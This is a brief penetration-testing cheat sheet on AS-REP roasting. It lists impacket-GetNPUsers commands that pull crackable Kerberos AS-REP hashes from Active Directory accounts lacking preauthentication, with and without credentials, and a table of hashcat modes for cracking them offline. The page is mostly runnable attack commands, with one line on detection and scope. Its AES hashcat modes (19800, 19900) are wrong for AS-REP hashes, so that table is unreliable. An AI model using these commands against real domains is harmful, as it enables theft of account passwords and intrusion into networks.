Skip to content

AS-REP Roast

Retrieve an AS-REP (TGT reply) for AD users with Do not require Kerberos preauthentication set, then crack offline.

Action Command
Request AS-REPs (no creds, list) impacket-GetNPUsers <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat -outputfile asrep.hashes
Single user (no creds) impacket-GetNPUsers <domain>/<user> -no-pass -dc-ip <dc_ip> -format hashcat
With valid creds impacket-GetNPUsers <domain>/<user>:'<password>' -dc-ip <dc_ip> -request -format hashcat -outputfile asrep.hashes

Crack With Hashcat

  • Identify the hash type below
AS-REP etype Hashcat mode Hash format signature (starts like…)
RC4-HMAC (etype 23) 18200 $krb5asrep$23$user@REALM.LOCAL:<salt_or_checksum>$<hex…>
AES128-CTS-HMAC-SHA1-96 (etype 17) 19800 $krb5asrep$17$user@REALM.LOCAL:<hex…>
AES256-CTS-HMAC-SHA1-96 (etype 18) 19900 $krb5asrep$18$user@REALM.LOCAL:<hex…>

Notes

  • Etype depends on domain/account crypto settings; you may see etype 23 or AES (17/18).
  • Requests are visible on DCs (TGT requests for accounts without preauth); scope operations appropriately.